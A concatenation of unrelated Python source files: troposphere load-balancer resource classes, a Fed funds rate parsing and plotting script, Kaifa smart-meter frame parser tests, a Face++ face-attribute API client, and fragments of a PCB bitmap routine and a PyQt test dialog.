for c, r in set(unk_open):
# Abort if any adjacent unknowns
if has_around(bitmap, c, r, 'u', order=1):
continue
# Is there surrounding metal forming a line? (or solid)
if not has_around(bitmap, c, r, 'm', order=2):
continue
print ' Unknown %dc, %dr => m: join m' % (c, r)
to_promote.add((c, r))
for (c, r) in to_promote:
bitmap[(c, r)] = 'm'
unk_open.discard((c, r))
|
<filename>troposphere/elasticloadbalancingv2.py
# Copyright (c) 2012-2013, <NAME> <<EMAIL>>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, If, Tags
from .validators import (
elb_name, exactly_one, network_port,
tg_healthcheck_port, integer,
one_of
)
class LoadBalancerAttributes(AWSProperty):
props = {
'Key': (basestring, False),
'Value': (basestring, False)
}
class Certificate(AWSProperty):
props = {
'CertificateArn': (basestring, False)
}
class AuthenticateCognitoConfig(AWSProperty):
props = {
"AuthenticationRequestExtraParams": (dict, False),
"OnUnauthenticatedRequest": (basestring, False),
"Scope": (basestring, False),
"SessionCookieName": (basestring, False),
"SessionTimeout": (integer, True),
"UserPoolArn": (basestring, True),
"UserPoolClientId": (basestring, True),
"UserPoolDomain": (basestring, True)
}
class AuthenticateOidcConfig(AWSProperty):
props = {
"AuthenticationRequestExtraParams": (dict, False),
"AuthorizationEndpoint": (basestring, True),
"ClientId": (basestring, True),
"ClientSecret": (basestring, True),
"Issuer": (basestring, True),
"OnUnauthenticatedRequest": (basestring, False),
"Scope": (basestring, False),
"SessionCookieName": (basestring, False),
"SessionTimeout": (integer, False),
"TokenEndpoint": (basestring, True),
"UserInfoEndpoint": (basestring, True)
}
class RedirectConfig(AWSProperty):
# https://docs.aws.amazon.com/
# AWSCloudFormation/latest/UserGuide/
# aws-properties-elasticloadbalancingv2-listener-redirectconfig.html
props = {
'Host': (basestring, False),
'Path': (basestring, False),
'Port': (basestring, False),
'Protocol': (basestring, False),
'Query': (basestring, False),
'StatusCode': (basestring, True),
}
def validate(self):
one_of(self.__class__.__name__,
self.properties,
'StatusCode',
['HTTP_301', 'HTTP_302'])
class FixedResponseConfig(AWSProperty):
props = {
'ContentType': (basestring, False),
'MessageBody': (basestring, False),
'StatusCode': (basestring, False),
}
def validate(self):
one_of(self.__class__.__name__,
self.properties,
'ContentType',
['text/plain', 'text/css', 'text/html',
'application/javascript', 'application/json'])
class Action(AWSProperty):
props = {
"AuthenticateCognitoConfig": (AuthenticateCognitoConfig, False),
"AuthenticateOidcConfig": (AuthenticateOidcConfig, False),
"FixedResponseConfig": (FixedResponseConfig, False),
"Order": (integer, False),
"RedirectConfig": (RedirectConfig, False),
"TargetGroupArn": (basestring, False),
"Type": (basestring, True)
}
def validate(self):
one_of(self.__class__.__name__,
self.properties,
'Type',
['forward', 'redirect', 'fixed-response'])
def requires(action_type, prop):
if self.properties.get('Type') == action_type and \
prop not in self.properties:
raise ValueError(
'Type "%s" requires definition of "%s"' % (
action_type, prop
)
)
if prop in self.properties and \
self.properties.get('Type') != action_type:
raise ValueError(
'Definition of "%s" allowed only with '
'type "%s", was: "%s"' % (
prop, action_type, self.properties.get('Type')
)
)
requires('forward', 'TargetGroupArn')
requires('redirect', 'RedirectConfig')
requires('fixed-response', 'FixedResponseConfig')
class Condition(AWSProperty):
props = {
'Field': (basestring, True),
'Values': ([basestring], True)
}
class Matcher(AWSProperty):
props = {
'HttpCode': (basestring, False)
}
class SubnetMapping(AWSProperty):
props = {
'AllocationId': (basestring, True),
'SubnetId': (basestring, True)
}
class TargetGroupAttribute(AWSProperty):
props = {
'Key': (basestring, False),
'Value': (basestring, False)
}
class TargetDescription(AWSProperty):
props = {
'AvailabilityZone': (basestring, False),
'Id': (basestring, True),
'Port': (network_port, False)
}
class Listener(AWSObject):
resource_type = "AWS::ElasticLoadBalancingV2::Listener"
props = {
'Certificates': ([Certificate], False),
'DefaultActions': ([Action], True),
'LoadBalancerArn': (basestring, True),
'Port': (network_port, True),
'Protocol': (basestring, True),
'SslPolicy': (basestring, False)
}
class ListenerCertificate(AWSObject):
resource_type = "AWS::ElasticLoadBalancingV2::ListenerCertificate"
props = {
'Certificates': ([Certificate], True),
'ListenerArn': (basestring, True),
}
class ListenerRule(AWSObject):
resource_type = "AWS::ElasticLoadBalancingV2::ListenerRule"
props = {
'Actions': ([Action], True),
'Conditions': ([Condition], True),
'ListenerArn': (basestring, True),
'Priority': (integer, True)
}
TARGET_TYPE_INSTANCE = 'instance'
TARGET_TYPE_IP = 'ip'
class TargetGroup(AWSObject):
resource_type = "AWS::ElasticLoadBalancingV2::TargetGroup"
props = {
'HealthCheckIntervalSeconds': (integer, False),
'HealthCheckPath': (basestring, False),
'HealthCheckPort': (tg_healthcheck_port, False),
'HealthCheckProtocol': (basestring, False),
'HealthCheckTimeoutSeconds': (integer, False),
'HealthyThresholdCount': (integer, False),
'Matcher': (Matcher, False),
'Name': (basestring, False),
'Port': (network_port, True),
'Protocol': (basestring, True),
'Tags': ((Tags, list), False),
'TargetGroupAttributes': ([TargetGroupAttribute], False),
'Targets': ([TargetDescription], False),
'TargetType': (basestring, False),
'UnhealthyThresholdCount': (integer, False),
'VpcId': (basestring, True),
}
class LoadBalancer(AWSObject):
resource_type = "AWS::ElasticLoadBalancingV2::LoadBalancer"
props = {
'LoadBalancerAttributes': ([LoadBalancerAttributes], False),
'Name': (elb_name, False),
'Scheme': (basestring, False),
'IpAddressType': (basestring, False),
'SecurityGroups': (list, False),
'SubnetMappings': ([SubnetMapping], False),
'Subnets': (list, False),
'Tags': ((Tags, list), False),
'Type': (basestring, False),
}
def validate(self):
conds = [
'SubnetMappings',
'Subnets',
]
def check_if(names, props):
validated = []
for name in names:
validated.append(name in props and isinstance(props[name], If))
return all(validated)
if check_if(conds, self.properties):
return
exactly_one(self.__class__.__name__, self.properties, conds)
|
<reponame>jrrpanix/ML9
import sys
import os
from matplotlib.dates import DateFormatter
import datetime
import matplotlib.pyplot as plt
import numpy as np
class RateDecision:
def __init__(self, d0, d1, r0, r1, dec, d, dr):
self.date0 = d0
self.date1 = d1
self.rate0 = r0
self.rate1 = r1
self.decision = dec
self.direction = d
self.dRate = dr
def __str__(self):
return "%s,%s,%.2f,%.2f,%s,%d,%.2f" % \
(self.date0.strftime("%Y%m%d"),self.date1.strftime("%Y%m%d"),self.rate0,
self.rate1,self.decision,self.direction,self.dRate)
class ParseWiki :
"""
quick code to paree the WikiPedia Fed Rate History Table
and create a csv file
input ../text/history/WikipediaFF.txt
output ../test/history/WikipediaFFParsed.csv
"""
def parse(fname="../text/history/WikipediaFF.txt"):
#output ../test/history/WikipediaFFParsed.csv
def fmtDate(m, d, y):
months=["January", "February", "March", "April", "May", "June", "July",
"August", "September", "October", "November", "December"]
mi= months.index(m)
return "%s%02d%02d" % (y, mi+1, int(d))
# hack for unrecognized character '-' from web
def getff(ff):
if len(ff) < 5:
return ff,ff
return ff[0:4], ff[5:]
ss = "date,fflb,ffub,disc_rate"
with open(fname) as fd:
for i,line in enumerate(fd):
if i == 0 :
continue
line=line.strip()
line=line.replace("\t", " ")
line=line.replace(",", " ")
line=line.replace(" "," ")
line=line.replace(" "," ")
tokens=line.split(" ")
tokens=[t for t in tokens if len(t) > 0]
if len(tokens) < 4 : continue
m,d,y = tokens[0], tokens[1], tokens[2]
ff = tokens[3].replace("%","")
fflb, ffub = getff(ff)
dr = tokens[4].replace("%","")
ss = "%s,%.2f,%.2f,%s" % (fmtDate(m,d,y), float(fflb),float(ffub), dr)
print(ss)
class HistDataReader:
def readWikiCSV(fname, cutoff=datetime.datetime(year=2001, month=1, day=1, hour=0,minute=0,second=0)):
# read the parsed Wikipedia data "WikipediaFFParsed.csv"
# input ../test/history/WikipediaFFParsed.csv
# output returns date, rates vector
def DT(ds):
return datetime.datetime(int(ds[0:4]),int(ds[4:6]),int(ds[6:]),0, 0, 0)
dates,rates = [],[]
with open(fname) as fd:
for i,line in enumerate(fd):
line=line.strip()
dt=DT(line.split(",")[0])
if dt < cutoff : continue
dates.append(dt)
rates.append(float(line.split(",")[1]))
return dates,rates
def readMacroTrends(fname, cutoff=datetime.datetime(year=2001, month=1, day=1, hour=0,minute=0,second=0)):
# read the downloaded macrotrends csv file
# input ../text/history/fed-funds-rate-historical-chart.csv
# output returns date, rates vector
def DT(year, month, day, hour=0, minute=0, second=0):
return datetime.datetime(year, month, day, hour, minute, second, 0)
def parseDate(d):
return DT(int(d[0:4]), int(d[5:7]), int(d[8:]))
with open(fname) as fd:
start=False
dates,rates = [],[]
for i,line in enumerate(fd):
line=line.strip()
if len(line) == 0 : continue
if not start and len(line.split(",")) != 2 : continue
if not start and len(line.split(",")) == 2 :
start=True
continue
dt = parseDate(line.split(",")[0])
if dt < cutoff : continue
dates.append(dt)
rates.append(float(line.split(",")[1]))
return dates,rates
def getMinutesDates(dirname):
# extract dates from file names of fedminutes data
# input ../text/minutes - directory name holding minutes files
# output returns mdates, adates - the two dates on teh minutes file names
def DT(ds):
return datetime.datetime(int(ds[0:4]),int(ds[4:6]),int(ds[6:]),0, 0, 0)
mdates, adates = [], []
for f in sorted(os.listdir(dirname)):
se = os.path.splitext(f)[0]
d0, d1 = se.split("_")[0], se.split("_")[-1]
mdates.append(DT(d0))
adates.append(DT(d1))
return mdates, adates
def readDecision(fname):
def DT(ds):
return datetime.datetime(int(ds[0:4]),int(ds[4:6]),int(ds[6:]),0, 0, 0)
data = []
with open(fname) as fd:
for line in fd:
line = line.strip()
if len(line) < 2 : continue
s = line.split(",")
data.append(RateDecision(DT(s[0]),DT(s[1]),float(s[2]),float(s[3]),s[4],int(s[5]),float(s[6])))
return data
class PlotFFHist:
"""
Plot MacroTrends FF, WikiPedia FF and FF minutes dates
"""
def plotData(macroCSV, wikiCSV, minutesDIR):
dates1, rates1 = HistDataReader.readMacroTrends(macroCSV)
dates2, rates2 = HistDataReader.readWikiCSV(wikiCSV)
mdates, adates = HistDataReader.getMinutesDates(minutesDIR)
#Fmt = DateFormatter("%Y-%m")
Fmt = DateFormatter("%Y")
fig, ax = plt.subplots()
ax.set(title="Federal Funds Rate History")
ax.plot(dates1, rates1, 'b', label='MacroTrends')
ax.plot(dates2, rates2, 'r', label='WikiPedia')
MaxRate=np.max(rates1)
for i in range(len(mdates)):
ax.plot([mdates[i],mdates[i]], [0, MaxRate], 'g')
ax.xaxis.set_major_formatter(Fmt)
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
plt.show()
class CreateFedAction:
def create(minutesDIR, macroCSV,tol=0.03):
# using the minutes dates and the macrotrends FF data set
# create a dataset which is the FED action
# input minutesDIR ../text/minutes
# input macrotrends ../text/history/fed-funds-rate-historical-chart.csv
# output RatesDecision.csv
mdates, adates = HistDataReader.getMinutesDates(minutesDIR)
dates, rates = HistDataReader.readMacroTrends(macroCSV)
for i in range(len(mdates)):
md, ad = mdates[i], adates[i]
mix = dates.index(md)
aix = dates.index(ad)
r0, r1 = rates[mix], rates[aix]
dr = r1 - r0
if dr > tol :
c,d = "raise",1
elif dr < -tol:
c,d = "lower",-1
else:
c,d = "unchg",0
print("%s,%s,%.2f,%.2f,%s,%d,%.2f" %
(md.strftime("%Y%m%d"), ad.strftime("%Y%m%d"), rates[mix], rates[aix],c,d,dr))
def plot(decisionFile):
def points(data, direction):
dates = np.array([d.date1 for i,d in enumerate(data) if d.direction == direction])
ddir = np.array([d.direction for d in data if d.direction == direction])
return dates, ddir
data = HistDataReader.readDecision(decisionFile)
update, updir = points(data, 1)
unchdate, unchdir = points(data, 0)
dndate, dndir = points(data, -1)
Fmt = DateFormatter("%Y")
fig, ax = plt.subplots()
ax.set(title="Fed Rate Decisions")
ax.scatter(update, updir, c='g', marker="^")
ax.scatter(unchdate, unchdir, c='b', marker="x")
ax.scatter(dndate, dndir, c='r', marker="v")
ax.xaxis.set_major_formatter(Fmt)
plt.show()
def main():
"""
To Run
python ./PlotData.py
defaults :
../text/history/fed-funds-rate-historical-chart.csv
../text/history/WikipediaFFParsed.csv
../text/minutes
../text/history/RatesDecision.csv
"""
defaults=["../text/history/fed-funds-rate-historical-chart.csv",
"../text/history/WikipediaFFParsed.csv",
"../text/minutes",
"../text/history/RatesDecision.csv"
]
if len(sys.argv) == 2 and sys.argv[1] =="--help":
print("Requires 3 Parameters, example usage")
print("python ./PlotData.py %s %s %s" % (defaults[0], defaults[1], defaults[2]))
quit()
elif len(sys.argv) == 4:
hist1, hist2, dirname = sys.argv[1], sys.argv[2], sys.argv[3]
else:
hist1, hist2, dirname = defaults[0], defaults[1], defaults[2]
assert os.path.exists(hist1) and os.path.exists(hist2) and os.path.exists(dirname)
#PlotFFHist.plotData(hist1, hist2, dirname)
CreateFedAction.plot(defaults[3])
if __name__ == '__main__':
main()
|
"""Kaifa tests."""
# pylint: disable = no-self-use
from __future__ import annotations
from datetime import datetime, timezone, timedelta
from pprint import pprint
import construct
from han import kaifa
from tests.assert_utils import (
assert_apdu,
assert_obis_element,
)
no_list_1 = bytes.fromhex(
"e6e700" "0f" "40000000" "090c07e3020401173416ff800000" "0201" "06000016dc"
)
no_list_2 = bytes.fromhex(
(
"e6e700"
"0f"
"40000000"
"090c 07e40119060d091eff800000"
"020d"
"0907 4b464d5f303031"
"0910 36393730363331343032363134343736"
"0908 4d413330344833450600002611"
"06 00000000"
"06 00000000"
"06 000001b3"
"06 00008415"
"06 00006dc7"
"06 00004702"
"06 00000878"
"06 00000000"
"06 0000088c"
).replace(" ", "")
)
no_list_3 = bytes.fromhex(
(
"e6e700"
"0f"
"40000000"
"090c 07e40119060e000aff800000"
"0212"
"0907 4b464d5f303031"
"0910 36393730363331343032363134343736"
"0908 4d41333034483345"
"06 00001328"
"06 00000000"
"06 00000000"
"06 00000179"
"06 000038eb"
"06 00003d1b"
"06 00002535"
"06 00000891"
"06 00000000"
"06 0000089d"
"090c 07e40119060e000aff800000"
"06 04be76e8"
"06 00000000"
"06 000d922d"
"06 0030feb4"
).replace(" ", "")
)
se_list = bytes.fromhex(
(
"e6e700"
"0f"
"40000000"
"00"
"0224"
"09060100000281ff 09074b464d5f303031"
"09060000600100ff 091037333430373334303733343037333430"
"09060000600107ff 09074d413330344834"
"09060100010700ff 0600000b00"
"09060100020700ff 0600000000"
"09060100030700ff 0600000000"
"09060100040700ff 0600000042"
"090601001f0700ff 0600001a7d"
"09060100330700ff 0600000316"
"09060100470700ff 06000017ed"
"09060100200700ff 0600000912"
"09060100340700ff 06000008fc"
"09060100480700ff 06000008f1"
"09060000010000ff 090c07e509160311231effffc400"
"09060100010800ff 0600490b23"
"09060100020800ff 0600000000"
"09060100030800ff 0600006674"
"09060100040800ff 060008d3e0"
).replace(" ", "")
)
class TestParseKaifa:
"""Test parse Kaifa frames."""
def test_parse_se_list(self):
"""Parse SE list."""
parsed = kaifa.LlcPdu.parse(se_list)
print(parsed)
assert_apdu(parsed, 4194304, 0)
assert (
parsed.information.notification_body.type
== kaifa.KaifaBodyType.OBIS_ELEMENTS
)
assert parsed.information.notification_body.length == 18
assert_obis_element(
parsed.information.notification_body.list_items[0],
"1.0.0.2.129.255",
"octet_string",
"KFM_001",
)
assert_obis_element(
parsed.information.notification_body.list_items[1],
"0.0.96.1.0.255",
"octet_string",
"7340734073407340",
)
assert_obis_element(
parsed.information.notification_body.list_items[2],
"0.0.96.1.7.255",
"octet_string",
"MA304H4",
)
assert_obis_element(
parsed.information.notification_body.list_items[3],
"1.0.1.7.0.255",
"double_long_unsigned",
2816,
)
assert_obis_element(
parsed.information.notification_body.list_items[4],
"1.0.2.7.0.255",
"double_long_unsigned",
0,
)
assert_obis_element(
parsed.information.notification_body.list_items[5],
"1.0.3.7.0.255",
"double_long_unsigned",
0,
)
assert_obis_element(
parsed.information.notification_body.list_items[6],
"1.0.4.7.0.255",
"double_long_unsigned",
66,
)
assert_obis_element(
parsed.information.notification_body.list_items[7],
"1.0.31.7.0.255",
"double_long_unsigned",
6781,
)
assert_obis_element(
parsed.information.notification_body.list_items[8],
"1.0.51.7.0.255",
"double_long_unsigned",
790,
)
assert_obis_element(
parsed.information.notification_body.list_items[9],
"1.0.71.7.0.255",
"double_long_unsigned",
6125,
)
assert_obis_element(
parsed.information.notification_body.list_items[10],
"1.0.32.7.0.255",
"double_long_unsigned",
2322,
)
assert_obis_element(
parsed.information.notification_body.list_items[11],
"1.0.52.7.0.255",
"double_long_unsigned",
2300,
)
assert_obis_element(
parsed.information.notification_body.list_items[12],
"1.0.72.7.0.255",
"double_long_unsigned",
2289,
)
date_time = parsed.information.notification_body.list_items[13]
assert isinstance(date_time, construct.Container)
assert date_time.obis == "0.0.1.0.0.255"
assert date_time.value_type == "octet_string"
assert date_time.value.datetime == datetime(
2021, 9, 22, 17, 35, 30, tzinfo=timezone(timedelta(hours=1))
)
assert_obis_element(
parsed.information.notification_body.list_items[14],
"1.0.1.8.0.255",
"double_long_unsigned",
4786979,
)
assert_obis_element(
parsed.information.notification_body.list_items[15],
"1.0.2.8.0.255",
"double_long_unsigned",
0,
)
assert_obis_element(
parsed.information.notification_body.list_items[16],
"1.0.3.8.0.255",
"double_long_unsigned",
26228,
)
assert_obis_element(
parsed.information.notification_body.list_items[17],
"1.0.4.8.0.255",
"double_long_unsigned",
578528,
)
def test_parse_no_list_1(self):
"""Parse NO list number 1."""
parsed = kaifa.LlcPdu.parse(no_list_1)
print(parsed)
assert_apdu(parsed, 4194304, datetime(2019, 2, 4, 23, 52, 22))
assert (
parsed.information.notification_body.type
== kaifa.KaifaBodyType.VALUE_ELEMENTS
)
assert parsed.information.notification_body.length == 1
assert parsed.information.notification_body.list_items[0].index == 0
assert parsed.information.notification_body.list_items[0].value == 5852
def test_parse_no_list_2(self):
"""Parse NO list number 2."""
parsed = kaifa.LlcPdu.parse(no_list_2)
print(parsed)
assert_apdu(parsed, 4194304, datetime(2020, 1, 25, 13, 9, 30))
assert parsed.information.notification_body.length == 13
assert parsed.information.notification_body.list_items[0].index == 0
assert parsed.information.notification_body.list_items[0].value == "KFM_001"
assert parsed.information.notification_body.list_items[1].index == 1
assert (
parsed.information.notification_body.list_items[1].value
== "6970631402614476"
)
assert parsed.information.notification_body.list_items[2].index == 2
assert parsed.information.notification_body.list_items[2].value == "MA304H3E"
assert parsed.information.notification_body.list_items[3].index == 3
assert parsed.information.notification_body.list_items[3].value == 9745
assert parsed.information.notification_body.list_items[4].index == 4
assert parsed.information.notification_body.list_items[4].value == 0
assert parsed.information.notification_body.list_items[5].index == 5
assert parsed.information.notification_body.list_items[5].value == 0
assert parsed.information.notification_body.list_items[6].index == 6
assert parsed.information.notification_body.list_items[6].value == 435
assert parsed.information.notification_body.list_items[7].index == 7
assert parsed.information.notification_body.list_items[7].value == 33813
assert parsed.information.notification_body.list_items[8].index == 8
assert parsed.information.notification_body.list_items[8].value == 28103
assert parsed.information.notification_body.list_items[9].index == 9
assert parsed.information.notification_body.list_items[9].value == 18178
assert parsed.information.notification_body.list_items[10].index == 10
assert parsed.information.notification_body.list_items[10].value == 2168
assert parsed.information.notification_body.list_items[11].index == 11
assert parsed.information.notification_body.list_items[11].value == 0
assert parsed.information.notification_body.list_items[12].index == 12
assert parsed.information.notification_body.list_items[12].value == 2188
def test_parse_no_list_3(self):
"""Parse NO list number 3."""
parsed = kaifa.LlcPdu.parse(no_list_3)
print(parsed)
assert_apdu(parsed, 4194304, datetime(2020, 1, 25, 14, 0, 10))
assert (
parsed.information.notification_body.type
== kaifa.KaifaBodyType.VALUE_ELEMENTS
)
assert parsed.information.notification_body.length == 18
assert parsed.information.notification_body.list_items[0].index == 0
assert parsed.information.notification_body.list_items[0].value == "KFM_001"
assert parsed.information.notification_body.list_items[1].index == 1
assert (
parsed.information.notification_body.list_items[1].value
== "6970631402614476"
)
assert parsed.information.notification_body.list_items[2].index == 2
assert parsed.information.notification_body.list_items[2].value == "MA304H3E"
assert parsed.information.notification_body.list_items[3].index == 3
assert parsed.information.notification_body.list_items[3].value == 4904
assert parsed.information.notification_body.list_items[4].index == 4
assert parsed.information.notification_body.list_items[4].value == 0
assert parsed.information.notification_body.list_items[5].index == 5
assert parsed.information.notification_body.list_items[5].value == 0
assert parsed.information.notification_body.list_items[6].index == 6
assert parsed.information.notification_body.list_items[6].value == 377
assert parsed.information.notification_body.list_items[7].index == 7
assert parsed.information.notification_body.list_items[7].value == 14571
assert parsed.information.notification_body.list_items[8].index == 8
assert parsed.information.notification_body.list_items[8].value == 15643
assert parsed.information.notification_body.list_items[9].index == 9
assert parsed.information.notification_body.list_items[9].value == 9525
assert parsed.information.notification_body.list_items[10].index == 10
assert parsed.information.notification_body.list_items[10].value == 2193
assert parsed.information.notification_body.list_items[11].index == 11
assert parsed.information.notification_body.list_items[11].value == 0
assert parsed.information.notification_body.list_items[12].index == 12
assert parsed.information.notification_body.list_items[12].value == 2205
assert parsed.information.notification_body.list_items[13].index == 13
assert parsed.information.notification_body.list_items[
13
].value.datetime == datetime(2020, 1, 25, 14, 0, 10)
assert parsed.information.notification_body.list_items[14].index == 14
assert parsed.information.notification_body.list_items[14].value == 79591144
assert parsed.information.notification_body.list_items[15].index == 15
assert parsed.information.notification_body.list_items[15].value == 0
assert parsed.information.notification_body.list_items[16].index == 16
assert parsed.information.notification_body.list_items[16].value == 889389
assert parsed.information.notification_body.list_items[17].index == 17
assert parsed.information.notification_body.list_items[17].value == 3210932
class TestDecodeKaifa:
"""Test decode Kaifa frames."""
def test_decode_frame_se_list(self):
"""Decode SE list."""
decoded = kaifa.decode_frame_content(se_list)
pprint(decoded)
assert isinstance(decoded, dict)
assert len(decoded) == 19
assert decoded["active_power_export"] == 0
assert decoded["active_power_export_total"] == 0
assert decoded["active_power_import"] == 2816
assert decoded["active_power_import_total"] == 4786979
assert decoded["current_l1"] == 6.781
assert decoded["current_l2"] == 0.79
assert decoded["current_l3"] == 6.125
assert decoded["list_ver_id"] == "KFM_001"
assert decoded["meter_datetime"] == datetime(
2021, 9, 22, 17, 35, 30, tzinfo=timezone(timedelta(hours=1))
)
assert decoded["meter_id"] == "7340734073407340"
assert decoded["meter_manufacturer"] == "Kaifa"
assert decoded["meter_type"] == "MA304H4"
assert decoded["reactive_power_export"] == 66
assert decoded["reactive_power_export_total"] == 578528
assert decoded["reactive_power_import"] == 0
assert decoded["reactive_power_import_total"] == 26228
assert decoded["voltage_l1"] == 232.2
assert decoded["voltage_l2"] == 230.0
assert decoded["voltage_l3"] == 228.9
def test_decode_frame_no_list_1(self):
"""Decode NO list number 1."""
decoded = kaifa.decode_frame_content(no_list_1)
pprint(decoded)
assert isinstance(decoded, dict)
assert len(decoded) == 3
assert decoded["active_power_import"] == 5852
assert decoded["meter_datetime"] == datetime(2019, 2, 4, 23, 52, 22)
assert decoded["meter_manufacturer"] == "Kaifa"
def test_decode_frame_no_list_2(self):
"""Decode NO list number 2."""
decoded = kaifa.decode_frame_content(no_list_2)
pprint(decoded)
assert isinstance(decoded, dict)
assert len(decoded) == 15
assert decoded["active_power_export"] == 0
assert decoded["active_power_import"] == 9745
assert decoded["current_l1"] == 33.813
assert decoded["current_l2"] == 28.103
assert decoded["current_l3"] == 18.178
assert decoded["list_ver_id"] == "KFM_001"
assert decoded["meter_datetime"] == datetime(2020, 1, 25, 13, 9, 30)
assert decoded["meter_manufacturer"] == "Kaifa"
assert decoded["meter_type"] == "MA304H3E"
assert decoded["reactive_power_export"] == 435
assert decoded["reactive_power_import"] == 0
assert decoded["voltage_l1"] == 216.8
assert decoded["voltage_l2"] == 0.0
assert decoded["voltage_l3"] == 218.8
def test_decode_frame_no_list_3(self):
"""Decode NO list number 3."""
decoded = kaifa.decode_frame_content(no_list_3)
pprint(decoded)
assert isinstance(decoded, dict)
assert len(decoded) == 19
assert decoded["active_power_export"] == 0
assert decoded["active_power_export_total"] == 0
assert decoded["active_power_import"] == 4904
assert decoded["active_power_import_total"] == 79591144
assert decoded["current_l1"] == 14.571
assert decoded["current_l2"] == 15.643
assert decoded["current_l3"] == 9.525
assert decoded["list_ver_id"] == "KFM_001"
assert decoded["meter_datetime"] == datetime(2020, 1, 25, 14, 0, 10)
assert decoded["meter_id"] == "6970631402614476"
assert decoded["meter_manufacturer"] == "Kaifa"
assert decoded["meter_type"] == "MA304H3E"
assert decoded["reactive_power_export"] == 377
assert decoded["reactive_power_export_total"] == 3210932
assert decoded["reactive_power_import"] == 0
assert decoded["reactive_power_import_total"] == 889389
assert decoded["voltage_l1"] == 219.3
assert decoded["voltage_l2"] == 0.0
assert decoded["voltage_l3"] == 220.5
|
import requests
import json
from PIL import Image, ImageDraw
# https://console.faceplusplus.com.cn/documents/4888373
#调用旷视科技的人脸识别api,返回人脸的属性
def face_detect(filepath):
http_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
key = '<KEY>'
secret = '<KEY>'
#filepath = '2.jpg'
data = {'api_key':key, 'api_secret':secret, 'return_landmark':'0','return_attributes':'gender,age,beauty,ethnicity,emotion,mouthstatus,skinstatus'}
files = {'image_file': open(filepath, 'rb')}
resposen = requests.post(http_url, data=data, files=files)
resp_dict = resposen.json()
#print(resp_dict)
num = len((resp_dict['faces']))
ans = ''
#ans = '照片上有' + str(num) + '个人'
#print (resp_dict)
#print (ans)
index = 0
if 'error_message' in resp_dict:
ans = '抱歉,服务器出现错误'
return (ans)
elif num == 0:
ans = '你的脸在哪里~~'
return ans
else:
for i in range(num):
if 'attributes' in resp_dict['faces'][i].keys():
beauty = resp_dict['faces'][i]['attributes']['beauty']['male_score'] + 18
age = resp_dict['faces'][i]['attributes']['age']['value']
gender = resp_dict['faces'][i]['attributes']['gender']['value']
emotion = resp_dict['faces'][i]['attributes']['emotion']
emotion_d = max(emotion,key = emotion.get)
#mouthstatus = resp_dict['faces'][i]['attributes']['mouthstatus']
#mouthstatus_d = max(mouthstatus,key = mouthstatus.get)
skinstatus = resp_dict['faces'][i]['attributes']['skinstatus']
skinstatus_d = max(skinstatus,key = skinstatus.get)
if gender == 'Male':
gender = '男'
else:
gender = '女'
#class_man = resp_dict['faces'][i]['attributes']['ethnicity']['value']
#if class_man == 'ASIAN':
# class_man = '亚洲人'
#elif class_man == 'BLACK':
# class_man = '黑人'
#elif class_man == 'WHITE':
# class_man = '白人'
#else:
# class_man = '印度人'
#情感分析
if emotion_d == 'anger':
emotion_d = '你看起来有点生气哦~~'
elif emotion_d == 'disgust':
emotion_d = '你好像看到什么厌恶的东西了哦~~'
elif emotion_d == 'fear':
emotion_d = '你好像有点恐惧~~'
elif emotion_d == 'happiness':
emotion_d = '你看起来很开心哦~~'
elif emotion_d == 'neutral':
emotion_d = '你看起来很平静~~'
elif emotion_d == 'sadness':
emotion_d = '你看起来有点伤心哦~~'
else:
emotion_d = '你看起来有点惊讶哦~~'
#嘴部状态分析
#if mouthstatus_d == 'close':
# mouthstatus_d = '你的嘴部没有遮挡,而且是闭合的~~'
#elif mouthstatus_d == 'open':
# mouthstatus_d = '你的嘴部没有遮挡,而且是张开的~~'
#elif mouthstatus_d == 'surgical_mask_or_respirator':
# mouthstatus_d = '你的嘴部可能被医用口罩遮挡~~'
#else:
# mouthstatus_d = '你的嘴部可能被什么东西挡住了~~'
#皮肤状态分析
if skinstatus_d == 'health':
skinstatus_d = '你的皮肤很健康哦~~'
elif skinstatus_d == 'stain':
skinstatus_d = '你的皮肤可能存在色斑~~'
elif skinstatus_d == 'acne':
skinstatus_d = '你的皮肤可能存在青春豆~~'
elif skinstatus_d == 'dark_circle':
skinstatus_d = '你可能有黑眼圈~~'
index = index+1
if beauty > 100 and gender == '男':
ans = ans + '\n-------\n' + '性别: ' + str(gender) + '\n' + '颜值: ' + '帅哥,你的颜值爆表了~~' + '\n' + '年龄: ' + str(age) + '\n' + '情绪: ' + emotion_d
elif beauty > 100 and gender == '女':
ans = ans + '\n-------\n' + '性别: ' + str(gender) + '\n' + '颜值: ' + '美女,你的颜值爆表了~~' + '\n' + '年龄: ' + str(age) + '\n' + '情绪: ' + emotion_d
else:
ans = ans + '\n-------\n' + '性别: ' + str(gender) + '\n' + '颜值: ' + str(beauty) + '\n' + '年龄: ' + str(age) + '\n' + '情绪: ' + emotion_d
if index == num:
ans = '照片上有' + str(num) + '个人' + ans
return ans
else:
ans = '照片上有' + str(num) + '个人,但是有' + str(num-index) + '个人脸属性无法判断' + ans
return ans
#print('gender: ' + str(gender) + '\n' + '颜值打分: ' + str(beauty) + '\n' + '年龄: ' + str(age) + '\n' + '所属人种: ' + class_man)
#if 'error_message' in resp_dict:
# return('这是人类吗?')
#else:
# return ans
#faces = resp_dict['faces']
#faceName = len(faces)
#im = Image.open(file_path)
#draw = ImageDraw.Draw(im)
#for i in range(faceName):
# face_rectangle = faces[i]['face_rectangle']
# width = face_rectangle['width']
# top = face_rectangle['top']
# left = face_rectangle['left']
# height = face_rectangle['height']
# start = (left, top)
# end = (left+width, top+height)
# draw.rectangle([start, end], outline='red')
#im.show()
# return ans
if __name__ == '__main__':
file_path = '/home/lk/python_web/WeRoBot-master/pic/22334559737202962.jpg'
ans = face_detect(file_path)
print(ans)
|
import subprocess
from PyQt5 import QtWidgets
from rujaion import util
class TestDialog(QtWidgets.QDialog):
def __init__(self, *args, compiled_file: str, settings):
super().__init__(*args)
self.console = self.parent().console
self.compiled_file = compiled_file
# self.is_interactive = util.StateFullCheckBox(settings, "TEST_INTERACTIVE", self)
self.tle_edit = util.StateFullTextEdit(settings, "TEST_TLE", self, "2.0")
self.mle_edit = util.StateFullTextEdit(settings, "TEST_MLE", self, "1024")
self.float_error_edit = util.StateFullTextEdit(
settings, "TEST_FLOAT_ERROR", self
)
self.dialogs = (
("Submit...", None),
("TLE", self.tle_edit),
("MLE", self.mle_edit),
("FLOAT ERROR", self.float_error_edit),
)
self.draw()
def draw(self, *args):
main_layout = QtWidgets.QVBoxLayout()
